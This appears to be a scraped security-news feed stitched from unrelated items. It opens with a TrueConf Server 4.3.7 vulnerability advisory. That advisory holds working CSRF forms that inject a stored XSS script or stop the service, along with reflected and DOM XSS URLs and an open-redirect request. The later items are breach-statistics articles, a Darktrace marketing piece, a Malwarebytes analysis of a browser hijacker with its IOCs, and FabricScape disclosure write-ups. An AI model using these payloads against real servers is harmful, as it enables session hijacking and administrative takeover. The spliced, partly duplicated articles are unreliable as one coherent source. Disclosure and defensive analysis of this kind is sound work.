A vulnerability classified as problematic was found in TrueConf Server 4.3.7. This vulnerability affects unknown code of the file /admin/service/stop/. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.

    TrueConf Server v4.3.7 Multiple Remote Web Vulnerabilities
    
    
    Vendor: TrueConf LLC
    Product web page: https://www.trueconf.com
    Affected version: 4.3.7.12255 and 4.3.7.12219
    
    Summary: TrueConf Server is a powerful, high-quality and highly secured
    video conferencing software server. It is specially designed to work with
    up to 250 participants in a multipoint conference over LAN or VPN networks.
    TrueConf Server requires no hardware and includes client applications for
    all popular platforms, making it an easy-to-set up, unified communications
    solution.
    
    Desc: The administration interface allows users to perform certain actions
    via HTTP requests without performing any validity checks to verify the requests.
    This can be exploited to perform certain actions with administrative privileges
    if a logged-in user visits a malicious web site.
    
    Input passed via the 'redirect_url' GET parameter is not properly verified before
    being used to redirect users. This can be exploited to redirect a user to an
    arbitrary website e.g. when a user clicks a specially crafted link to the affected
    script hosted on a trusted domain.
    
    TrueConf also suffers from multiple stored, reflected and DOM XSS issues when
    input passed via several parameters to several scripts is not properly sanitized
    before being returned to the user. This can be exploited to execute arbitrary HTML
    and script code in a user's browser session in context of an affected site.
    
    
    Tested on: Microsoft Windows 7 Professional SP1 (EN)
               Apache/2.4.17 (Win32)
               PHP/5.4.41
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                @zeroscience
    
    
    Advisory ID: ZSL-2017-5393
    Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5393.php
    
    
    01.11.2016
    
    --
    
    
    CSRF Stored XSS:
    ----------------
    
    <html>
      <body>
        <form action="http://127.0.0.1:8888/admin/conferences/applyCreate" method="POST">
          <input type="hidden" name="send&#95;invite&#95;mail" value="1" />
          <input type="hidden" name="invitation&#95;type" value="&#45;1" />
          <input type="hidden" name="hide&#95;invitation&#95;type" value="&#45;1" />
          <input type="hidden" name="date" value="22&#46;01&#46;2017" />
          <input type="hidden" name="time&#45;field" value="17&#58;27" />
          <input type="hidden" name="time&#95;zone" value="60" />
          <input type="hidden" name="subtype" value="3" />
          <input type="hidden" name="podiums" value="6" />
          <input type="hidden" name="cid" value="&#92;c&#92;dfa95f7e1d" />
          <input type="hidden" name="key" value="dfa95f7e1d" />
          <input type="hidden" name="topic" value="<script>alert&#40;&apos;XSS&apos;&#41;<&#47;script>" />
          <input type="hidden" name="description" value="" />
          <input type="hidden" name="owner" value="" />
          <input type="hidden" name="gconf&#45;edit" value="ok" />
          <input type="hidden" name="webTtype" value="0" />
          <input type="submit" value="Submit form" />
        </form>
      </body>
    </html>
    
    
    
    Reflected XSS:
    --------------
    
    http://127.0.0.1:8888/admin/conferences/get-all-status/?keys[]=<img src=j onerror=confirm(251) >
    http://127.0.0.1:8888/admin/conferences/list/?sort=status%26'%22()%26%25<div><ScRiPt%20>prompt(251)</ScRiPt>
    http://127.0.0.1:8888/admin/group/list/?checked_group_id=0001&sort=name
    http://127.0.0.1:8888/admin/group/list/?checked_group_id=' onmouseover=confirm(251) ?
    
    
    
    DOM XSS:
    --------
    
    http://127.0.0.1:8888/admin/group?'\><script>confirm("XSS")</script>
    http://127.0.0.1:8888/admin/conferences/list/?domxss=javascript:domxssExecutionSink(1,"'\"><script>alert("XSS")</script>
    
    
    
    Open Redirect:
    --------------
    
    Request:
    
    GET /admin/general/change-lang?lang_on=en&redirect_url=http://www.zeroscience.mk HTTP/1.1
    Host: 127.0.0.1:8888
    Connection: Keep-alive
    Accept-Encoding: gzip,deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
    Accept: */*
    
    Response:
    
    HTTP/1.1 302 Found
    Date: Thu, 22 Sep 2016 21:15:40 GMT
    Server: Apache
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
    Pragma: no-cache
    Location: http://www.zeroscience.mk
    Content-Length: 0
    Keep-Alive: timeout=5, max=75
    Connection: Keep-Alive
    Content-Type: text/html; charset=utf-8
    
    
    
    CSRF Stop Web Service:
    ----------------------
    
    <html>
      <body>
        <form action="http://127.0.0.1/admin/service/stop/" method="POST">
          <input type="submit" value="Submit form" />
        </form>
      </body>
    </html>

CVE-2017-20120: Offensive Security’s Exploit Database Archive

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-30192, CVE-2022-33638.

CVE-2022-33639

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-33638, CVE-2022-33639.

CVE-2022-30192

Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-30192, CVE-2022-33639.

CVE-2022-33638

External attacks focused on vulnerabilities are still the most common ways that companies are successfully attacked, according to incident data.

Attackers continue to find significant success targeting unpatched servers and vulnerable remote-access systems, researchers say -- and these types of compromises cost victim organizations 54% more than compromises caused by user actions (i.e., falling for phishing and opening malicious documents).

According to a Wednesday report by security firm Tetra Defense, which analyzed incident data from the first quarter, unpatched vulnerabilities and exposing risky services—such as Remote Desktop Protocol (RDP)—account for 82% of successful attacks, while social-engineering employees to take some action accounted for just 18% of successful compromises.   

Incident data collected by the firm showed that the ProxyShell exploit for Microsoft Exchange servers accounted for about a third of external breaches, while insecure Remote Desktop Protocol (RDP) servers accounted for a quarter.

While the Log4Shell bug continued to see a great deal of media coverage, the attack vector was only used in 22% of breaches, says Nathan Little, senior vice president of digital forensics and incident response (DFIR) at Tetra Defense.

"We expect these tactics to continue—however, there is a finite amount of vulnerable Exchange servers," he says. "Over time—and we have seen this over the past five-plus years—the vulnerabilities that are used by threat actors will change, but \[in general\] externally accessible vulnerabilities will continue to be a favorite attack vectors for cybercriminals."

Healthcare topped the list of targeted industries, with nearly 20% of compromised organizations falling in that category. Finance and education tied for second at 13%, and manufacturing accounted for 12% of incidents, according to Tetra Defense's data.  

Tetra Defense also tracked the cybercrime actors responsible for most breaches, and found that four groups—Lockbit 2.0, BlackCat, Conti, and Hive—are responsible for about half of all compromises investigated by the firm.  

**Cloud Misconfiguration: Less Costly Than Other Cyber-Incidents**

While a common form of vulnerability, misconfigurations did not account for much of the cost of breaches, with few requests to investigate such compromises, Tetra Defense's Little says.  

"For misconfigurations—because they can range from an AWS S3 bucket being publicly accessible with sensitive information stored in it -- to a non-sensitive server being exposed with a default username and password — the costs can range drastically," he says. "Typically speaking, the costs of misconfiguration are lower than unpatched systems and accidental user action."

While damages are hard to estimate, Little sees the potential impact as a percentage of revenue, with a reasonable financial impact of a major cybersecurity incident accounting for 2% to 10% of annual revenue.

He also notes that two controls -- comprehensive patching and using multifactor authentication (MFA) -- could have prevented nearly 80% of the investigated incidents. That includes 57% of external compromises that used an unpatched vulnerability, and the 13% of successful attacks on virtual private networks that either exploited a vulnerability or used stolen credentials to gain access where there was not MFA enabled, Little says.

"This shows that these two controls alone would have a drastic impact in decreasing the risk of a ransomware incident," he says. "The cost savings for a company would be the difference between having a data breach and ransomware incident that could stop business for a week or more and cause reputational harm or not."

**Conflicting Data**

Data on successful compromises can help companies determine the most critical attack vectors to address, but it should be noted that the conclusions depend greatly on the specific incident-response firm.   

For instance, earlier this year, security-advisory firm Kroll saw phishing continue to grow, with 60% of the cases the company investigated using phishing attacks as the initial-access vector. Meanwhile, the exploitation of vulnerabilities dropped by half to 13% of all initial compromises, down from 27% in Q4 2021.

    

Source: Tetra Defense

"Despite a decrease in ransomware incidents and the disruption and exposure of a number of key threat groups ... 2022 is proving to be the year of attacker diversity, with actors exploiting new methods, such as email compromise, leading to extortion," Kroll stated in its latest quarterly threat landscape report.  

**Ransomware Spike**

By way of context, in February, incident-response firm CrowdStrike released its annual report on its own incident data from 2021 showing that breaches related to ransomware attacks had grown by 82%. In addition, the company's data showed that malware had only been used in only 38% of successful intrusions, with 45% of attackers manually conducting the attacks.  

The average time to move from an initial compromise to attacking other systems on the network—what CrowdStrike calls the "breakout time"—remained near 1.5 hours, according to the company's data.

Cyberattacks via Unpatched Systems Cost Orgs More Than Phishing

Attacks against U.S. companies spike in Q1 2022 with patchable and preventable external vulnerabilities responsible for bulk of attacks.

Attacks against U.S. companies spike in Q1 2022 with patchable and preventable external vulnerabilities responsible for bulk of attacks.

Eighty-two percent of attacks on organizations in Q1 2022 were caused by the external exposure of a known vulnerabilities in the victim’s external-facing perimeter or attack surface. Those unpatched bugs overshadowed breach-related financial losses tied to human error, which accounted for 18 percent.

The numbers come from Tetra Defense and its quarterly report that sheds light on a notable uptick in cyberattacks against United States organizations between January and March 2022.

The report did not let employee security hygiene, or a lack thereof, off the hook. Tetra revealed that a lack of multi-factor authentication (MFA) mechanisms adopted by firms and compromised credential are still major factors in attacks against organizations.

****External Exposures: A Major Path of Compromise****

The study looks at the Root Point of Compromise (RPOC) in attacks. The RPOC is the initial entry point through which a threat actor infiltrates a victim organization and is categorized as the external exposure to a known vulnerability, or a malicious action performed by the user or a system misconfiguration.

“Incidents caused by unpatched systems cost organizations 54 percent more than those caused by employee error,” according to the report.

Researcher draw a line of distinction between “External Vulnerabilities” and “Risky External Exposures”.

External Vulnerabilities, defined by Tetra Defense, refers incidents where an attacker leverages the publicly available exploit to attack the victim’s network. Risky External Exposure, on the other hand, include IT practices such as leaving an internet-facing port open that can be used by an adversary to target the system.

“These behaviors are considered ‘risky’ because the mitigation relies on an organization’s continued security vigilance and willingness to enforce consistent standards over long periods of time,” said Tetra Defense in the report.

Risky External Exposure, the study found, account for 57 percent of an organizations’ losses.

****Learning Lessons the Hard Way****

According to Tetra Defense, the widespread awareness about the Log4Shell vulnerability minimize the active exploitation and was only the third most exploited external exposure accounting for 22 percent of total incident response cases. The Microsoft Exchange vulnerability ProxyShell outpaces the Log4Shell and leads the way by accounting for 33 percent of cases.

The Tetra Defense revealed that nearly 18 percent of the events were caused by the unintentional action performed by an individual employee in the organization.

“Over half (54 percent) of the incidents where ‘User Action’ was the RPOC were caused by an employee opening a malicious document,” Tetra Defense noted. The researcher analyzed that most incidents include malicious email campaigns targeting individuals and organizations at random.

The other major incident is the abuse of compromised credentials which contributes to 23 percent of incidents involved in user action. The reports indicate that usage of the same password across multiple sites is one of the main factors leading to credential leaking and account takeover.

“If one of the sites experiences a breach and the credentials are leaked to the dark web, those credentials can be used to compromise other systems where the same pair of username and password is used,” said Tetra Defense.

In the recent findings by Tetra Defense, the healthcare industry leads with approximately 20 percent of the total incidents reported in the first quarter of 2022. Apart from healthcare Tetra Defense collected insights from twelve different verticals including finance, education, manufacturing and construction.

****The Patching Imperative****

According to the reports by Tetra Defense, the median cost for an incident response engagement where external vulnerability was the RPOC is 54 percent more than the events where “User Action” was the RPOC.

“Advocating for better patching practices has almost become a cliché at this point as it’s common knowledge that it plays a major role in reducing cyber risk,” Tetra Defense noted.

“To best prevent exploitation of external vulnerabilities, organizations need to understand their attack surface and prioritize patching based on risk, all while ensuring they have the defenses in place to protect their systems knowing that that will have obstacles that will prevent them from immediately patching vulnerable systems,” Tetra Defense added.

The researcher observed multiple cybercriminal groups active on the dark web. “With such a large number of groups being actively observed it highlights the constant challenges organization have in protecting themselves, because if even one group becomes inactive or is taken down by law enforcement, there remain dozens of other groups actively trying to compromise them,” Tetra Defense concluded.

Patchable and Preventable Security Issues Lead Causes of Q1 Attacks

See how these novel, sophisticated, or creative threats used techniques such as living off the land to evade detection from traditional defensive measures — but were busted by AI.

We're now halfway through 2022, and already we have seen a range of cyberattacks, familiar and unfamiliar, disrupting organizations. However, we have also seen uplifting stories of successful threat detection efforts, as well.

In this article, we will look at five novel, sophisticated, or creative threats that used techniques such as "living off the land" to evade detection by traditional defensive measures. These threats were all discovered by artificial intelligence (AI) technology, which can spot subtle deviations in device and user behavior and autonomously enforce "normal," stopping a threat in its tracks.

**1\. Leading Laboratory Interrupts Dark Web Insider Threat With AI**

Cyberattacks against the healthcare sector hit record highs last year, and for these organizations cyber threats can have severe real-world consequences. One of Darktrace's healthcare clients is a company specializing in the research, development, and manufacturing of innovative in vitro diagnostic tests for disease, conditions, and infections.

In March, this company was targeted by a malicious insider threat. An employee was looking to exploit their access within the organization to sell proprietary intellectual property, perhaps even medical supplies, on the Dark Web. The employee was detected using Tor on a company device to connect to a Dark Web pharmaceutical market forum.

Malicious or compromised insiders can be difficult to identify because their privileged access and knowledge of company workings allow them to evade detection by traditional security tools. In order to protect intellectual property from insider threat, organizations need to augment security teams with AI-powered technology to stop malicious activity in real time.

In this case, given that no other company device had visited the Tor network in the past, Darktrace's AI flagged the activity to the security team, who were then able to investigate the employee and discover their malicious intentions.

**2\. Babuk Double-Extortion Ransomware Neutralized at a Technology Manufacturer**

Babuk is a double-extortion ransomware strain that has successfully attacked high-value organizations around the world since 2021. In February 2022, however, it targeted a multinational technology manufacturer that had deployed AI cybersecurity. The targeted company facilitates the adoption of smart medical devices as well as electric and autonomous vehicles. This means uptime is important, and ransomware poses a significant risk.

The first sign of a threat came in the early hours of the morning, when the AI detected a company device performing network scanning and making unusual connections to other internal devices. Based on its understanding of the device's usual "pattern of life," the AI identified this out-of-the-ordinary behavior as malicious and calculated a response.

The AI was able to stop this attack without interfering with normal business operations in the company's office or on the manufacturing floor. It blocked only the malicious connections, while allowing the rest of the compromised device's operations to continue.

Once the attack had been stopped, a post-compromise analysis conducted by the AI revealed that the compromised device had indeed been attempting to distribute files with "babyk" extensions. These attacks often strike out of hours, so defenders of critical infrastructure should consider using artificial intelligence to allow their organizations to self-defend against advanced threats.

**3\. HR-Spoofing Attack Targets Employees at Private Equity Firm**

Phishing and spoofing emails continue to be the favorite initial entry point for cyberattackers. Earlier this year, a private equity firm looking to bolster its email security efforts trialed an AI email security solution and detected a targeted spoofing attack almost immediately.

The attackers had tailored their email to imitate the company's internal HR communications, titling it "Q3 Commission 2021 and Agenda" and designing it to look like a SharePoint Microsoft document. To a company employee, this email would not have looked at all out of place in their inbox.

Further investigation showed the email to be part of a wider trend of targeted phishing campaigns that use fake Microsoft branding to trick employees. The exact motivations of this attack are unknown because it was stopped in its earliest stages, but attacks like it are often launched with the aim of causing operational disruption or conducting IP and financial theft.

**4\. Ransomware Attack Against a Financial Services Provider Halted**

In March 2022, a South African financial services firm decided to try out Darktrace's technology and immediately uncovered an in-progress ransomware attack attempting to encrypt its most valuable data.

The first sign of compromise was a company mail server making unusual HTTP connections to an external endpoint and communicating with a malicious server via the Internet. Its understanding of the business and this particular mail server's normal behavior allowed the AI to identify the threatening activity.

The compromised server was then seen attempting to perform network reconnaissance and lateral movement to increase its presence within the organization. Further investigation revealed that attackers had obtained the credentials of 11 employees, including several C-level executives. With the attack spreading fast, more and more company devices began attempting to communicate with the malicious external server.

The AI quickly interrupted further attempts at communication with the malicious server but allowed normal business operations to continue. With the attack safely contained, Darktrace helped the company's security team to conduct a full investigation and ensure that the attack had been completely neutralized.

**5\. AI Stops Log4j Exploit at a Global Financial Services Provider**

The Log4Shell vulnerability that went public at the end of 2021 is one of the most serious and widespread exploits on record. It is thought by some to have affected hundreds of millions of devices and, as a zero-day, it has evaded lots of traditional security tools.

Fortunately, AI security has been able to mitigate the effects of Log4Shell for many of the organizations it protects. One of these, a global financial services provider with assets of over $5 billion, was targeted in March 2022.

The attackers used a Log4j vulnerability to gain access to one of the company's virtual desktop infrastructure (VDI) servers, from which they attempted to scan the surrounding network and spread throughout the enterprise. The server began downloading a shell script from a suspicious external endpoint, prompting an immediate alert from the company's AI-driven security measures.

Convinced of the severity of the threat by the alert, the company's security team promptly deployed AI technology to take precise action against the threat and maintain the regular business activities on the VDI server.

Fast action from this AI-driven response technology blocked the malicious connections and prevented the threat from progressing further, very likely saving the company from a ransomware attack.

5 Surprising Cyberattacks AI Stopped This Year

Malwarebytes found a family of forced Chrome extensions that can't be removed because of a policy change that tells users "Your browser is managed".
The post Forced Chrome extensions get removed, keep reappearing appeared first on Malwarebytes Labs.

In the continued saga of annoying search extensions we have a new end-of-level boss.

Victims have been reporting browser extensions that were removed by Malwarebytes, but “magically” came back later. Since the victims also complained about the message saying their browser was “managed”, we had a pretty good idea where to look.

_custom search bar_ is _one of the forced extensions_

**Search extensions**

The culprits turned out to be search extensions. Which is often the case when we spot potentially unwanted programs (PUPs) that use malware tactics to get installed and gain persistence.

The search hijackers “active search bar” and “custom search bar” were both available in the Chrome web store at the time of writing even though we reported them days ago.

_active search bar is also available in the webstore_

**PowerShell**

It took some digging to find the origin, since all we had were the extensions. And when the extensions were installed directly from the webstore, nothing happened out of the ordinary. However, some hunting on VirusTotal soon led me to a few recently uploaded PowerShell scripts that included the string “ExtensionInstallForcelist.” I looked for that string because we know from the past that these registry policies account for the “Your browser is managed” warnings.

$CPath = "HKLM:\SOFTWARE\\Policies\\Google\\Chrome\ExtensionInstallForcelist";

$EPath = "HKLM:\SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForcelist";

The description in the Chromium documentation about the ExtensionInstallForcelist states:

> “Specifies a list of apps and extensions that are installed silently, without user interaction, and which cannot be uninstalled nor disabled by the user.”

And to confirm this finding, the victims that provided logs all had one of these PowerShell script listed in their Scheduled Tasks.

_The Scheduled Task triggers the PowerShell script_

The Scheduled Task was set to run every four hours, which explained why the extensions kept coming back.

**Installer**

But Scheduled Tasks don’t install themselves either and dropping PowerShell scripts in the System32 folder requires Administrator privileges, so we needed to dig a little further to find an installer.

The domain wincloudservice.com was used as a download location in all the PowerShell scripts so we used that domain as a search parameter in our next stage of VirusTotal hunting. This search eventually returned three installers. What they had in common at first glance was that the filenames all ended with “\_x64LTS.exe” and that they were all signed by “Tommy Tech LTD.”

Upon further inspection we noticed that the installers all asked for Administrator privileges twice. The first part installs something that is called “Setup” and the second part installs an application that aligns with the name of the installer. So, it appears that the original installer files were “patched” to add the installer for our browser hijacker. It stands to reason that these installers are offered for download somewhere by the threat actors.

The EULA points to tommytechil.com which is unreachable. I was unable to find an installer that actually dropped an extension in Edge, but the “Your browser is managed by your organization” setting does get enforced.

_Edge managed by your organization_

**Javascripts**

Malwarebytes customers were protected against these extensions as Malwarebytes’ web protection module blocked the domain wincloudservice\[.\]com. On inspection, this domain hosted several javascripts including heavily obfuscated files called crypto.js and crypto-js.min.js.

**Detection and removal**

Malwarebytes detects these browser hijackers as PUP.Optional.ActiveSearchBar and PUP.Optional.CustomSearchBar. Included in the removal procedure are the extension, and the Scheduled Task, which is enough to permanently get rid of the extension.

Some Windows registry changes have been made that will take a system administrator to decide what they want to keep or not.

The registry keys to remove the “Your browser is managed” are:

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Google\Chrome\ExtensionInstallForceList

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Edge\ExtensionInstallForceList

And another change made by the installer was the registry value:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\\\\ExecutionPolicy

The installer set that to “Unrestricted” which may not be your favorite setting. If you are not sure or you have never actively set that policy, the default is “Restricted”. Please note that in some organizations PowerShell is required to run.

**IOCs**

**Domains:**

activesearchbar\[.\]me

customsearchbar\[.\]me

optimizerupdate\[.\]com

securedatacorner\[.\]com

wincloudservice\[.\]com

**Installers:**

4kvideodownloader\_5.22.371\_x64LTS.exe

AutoClicker\_x64LTS.exe

FPSUnlocker\_4.1\_x64LTS.exe

**PowerShell scripts:**

PrintWorkflowService.ps1

WindowsUpdater1.ps1

OptimizerWindows.ps1

**Extensions:**

custom search bar nniikbbaboifhfjjkjekiamnfpkdieng

active search bar pkofdnfadkamabkgjdjcddeopopbdjhg

Forced Chrome extensions get removed, keep reappearing

Cybersecurity researchers from Palo Alto Networks Unit 42 disclosed details of a new security flaw affecting Microsoft's Service Fabric that could be exploited to obtain elevated permissions and seize control of all nodes in a cluster.
The issue, which has been dubbed FabricScape (CVE-2022-30137), could be exploited on containers that are configured to have runtime access. It has been remediated

Cybersecurity researchers from Palo Alto Networks Unit 42 disclosed details of a new security flaw affecting Microsoft's Service Fabric that could be exploited to obtain elevated permissions and seize control of all nodes in a cluster.

The issue, which has been dubbed **FabricScape** (CVE-2022-30137), could be exploited on containers that are configured to have runtime access. It has been remediated as of June 14, 2022, in Service Fabric 9.0 Cumulative Update 1.0.

Azure Service Fabric is Microsoft's platform-as-a-service (PaaS) and a container orchestrator solution used to build and deploy microservices-based cloud applications across a cluster of machines.

"The vulnerability enables a bad actor, with access to a compromised container, to escalate privileges and gain control of the resource's host SF node and the entire cluster," Microsoft said as part of the coordinated disclosure process.

"Though the bug exists on both Operating System (OS) platforms, it is only exploitable on Linux; Windows has been thoroughly vetted and found not to be vulnerable to this attack."

A Service Fabric cluster is a network-connected set of several nodes (Windows Server or Linux), each of which are designed to manage and execute applications that consist of microservices or containers.

The vulnerability identified by Unit 42 resides in a component called Diagnostics Collection Agent (DCA) that's responsible for gathering diagnostic information and relates to what's called a "symlink race."

In a hypothetical scenario, an attacker with access to a compromised containerized workload could substitute a file read by the agent ("ProcessContainerLog.txt") with a rogue symbolic link that could then be leveraged to overwrite arbitrary any file considering DCA runs as root on the node.

"While this behavior can be observed on both Linux containers and Windows containers, it is only exploitable in Linux containers because in Windows containers unprivileged actors cannot create symlinks in that environment," Unit 42 researcher Aviv Sasson said.

Code execution is subsequently achieved by taking advantage of the flaw to override the "/etc/environment" file on the host, followed by exploiting an internal hourly cron job that runs as root to import malicious environment variables and load a rogue shared object on the compromised container that grants the attacker a reverse shell in the context of root.

"In order to gain code execution, we used a technique called dynamic linker hijacking. We abused the LD\_PRELOAD environment variable," Sasson explained. "During the initialization of a new process, the linker loads the shared object that this variable points to, and with that, we inject shared objects to the privileged cron jobs on the node.

Although there is no evidence that the vulnerability has been exploited in real-world attacks to date, it's crucial that organizations take immediate action to determine if their environments are susceptible and implement the patches.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New 'FabricScape' Bug in Microsoft Azure Service Fabric Impacts Linux Workloads

Under Coordinated Vulnerability Disclosure (CVD), cloud-security vendor Palo Alto Networks informed Microsoft of an issue affecting Service Fabric (SF) Linux clusters (CVE-2022-30137). The vulnerability enables a bad actor, with access to a compromised container, to escalate privileges and gain control of the resource’s host SF node and the entire cluster. Though the bug exists on …
  Service Fabric Privilege Escalation from Containerized Workloads on Linux Read More »

Under Coordinated Vulnerability Disclosure (CVD), cloud-security vendor Palo Alto Networks informed Microsoft of an issue affecting Service Fabric (SF) Linux clusters (CVE-2022-30137). The vulnerability enables a bad actor, with access to a compromised container, to escalate privileges and gain control of the resource’s host SF node and the entire cluster.

Though the bug exists on both Operating System (OS) platforms, it is only exploitable on Linux; Windows has been thoroughly vetted and found not to be vulnerable to this attack. The fix for this privilege escalation issue was made available on 26 May 2022 and has been applied to all customers subscribed to automatic updates.

**Customer Impact:**

Customers without automatic updates enabled should upgrade their Linux clusters to the most recent SF release. Release notes can be found here. **Customers whose Linux clusters are automatically updated do not need to take further action**.

Additionally, if you are running SF Windows clusters, you are not impacted by this issue. However, we always recommend staying updated to the latest release.

Microsoft recommends that customers continue to review all containerized workloads (both Linux and Windows) which are permitted access to their host clusters. By default, a SF cluster is a single-tenant environment and thus there is no isolation between applications. Creating isolation is possible and additional guidance on hosting untrusted code can be found on the Azure Service Fabric security best practices page.

**Microsoft’s Mitigation:**

Once this issue was reported to Microsoft, we took the following steps to investigate and mitigate the issue:

*   **24 May 2022** – We fixed the privilege escalation bug in the SF runtime and started updating the customers with automated updates enabled; specifically, the SF Diagnostics Collection Agent (DCA) was changed to not consume user-generated files written into the container’s log folder.
*   **09 Jun 2022** – We updated our public security guidance including details regarding the implications of hosting untrusted code or having one’s containers compromised.
*   **14 Jun 2022** – CVE-2022-30137 was published for this issue and the fixes were deployed to customers leveraging automatic updates. Customers without automatic updates received portal notifications through Azure Service Health.

**Technical Details:**

For an attack to be successful on the vulnerability, these ordered steps are required:

*   **Step 1**: An attacker must compromise a containerized workload deployed by the owner of a Linux SF cluster.
*   **Step 2**: The hostile code running inside the container could substitute an index file read by DCA with a symlink.
    *   Using an additional timing attack, an attacker could gain control of the machine hosting the SF node.

By design, root access on the machine hosting the SF note is not considered a security boundary in an SF cluster; the highest privileged role on a node is equally privileged anywhere in the same cluster.

Palo Alto Networks posted a blog about this issue available here. We appreciate the opportunity to investigate the findings reported by Palo Alto Networks and thank them for practicing safe security research under the terms of our bug bounty program. More information about the Microsoft Bug Bounty Program and the program’s Terms and Conditions can be found using these links.

**Additional references:**

*   Microsoft published CVE-2022-30137
*   Azure Service Fabric release notes

Tag

#microsoft